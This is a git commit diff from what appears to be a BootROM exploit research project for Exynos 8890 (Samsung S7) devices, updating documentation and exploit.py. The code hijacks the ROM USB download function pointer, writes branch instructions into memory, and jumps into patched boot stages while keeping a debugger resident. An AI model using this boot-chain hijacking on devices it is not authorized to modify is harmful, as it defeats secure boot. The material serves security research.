Minor docs update and exploit.py update

documentation/source/BootROM_8890/03_exploit_boot_chain.rst

@@ -154,8 +154,10 @@ We searched for quite some time for a space which was both writeable and executa
 
 Python part
 ^^^^^^^^^^^
+Python code to setup the debugger.
 
 .. code-block:: python
+
     # Setup initial debugger
     self.setup_guppy_debugger()
     self.cd.arch_dbg.state.auto_sync = False

source/exploit/exploit.py

@@ -774,8 +774,8 @@ class ExynosDevice():
         # Restore bootflow
         # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
         
-        # Restore this to 
+        # Disable this to keep access to the debugger after senindg the next stage
-        self.cd.restore_stack_and_jump(hijacked_fun)
+        # self.cd.restore_stack_and_jump(hijacked_fun)
 
         # ==== Stage 5  ====
         stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()  
@@ -789,6 +789,26 @@ class ExynosDevice():
         # assert len(stage4) == stage4_len, "Invalid stage4 length"
 
         self.send_normal_stage(stage4)
+
+        # TRYOUT PATCHING BL33
+        # BL1 is loaded, now authenticate and patch it
+        auth_bl1(DEBUGGER_ADDR)
+        self.usb_write(b"FLSH") # Flush cache (Frederic does this..)
+
+        # Hijack ROM download function
+        hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4)) 
+        self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
+        self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
+
+        # Jump into BL1 (sboot.bin.1.bin)
+        JUMP_BL33 = 0x8f000000
+        def jump_bl33(lr):
+            self.cd.arch_dbg.state.LR = lr
+            self.cd.restore_stack_and_jump(JUMP_BL33)
+
+        # And jump into BL1 to execute it
+        jump_bl33(DEBUGGER_ADDR)
+
         time.sleep(2)
 
         pass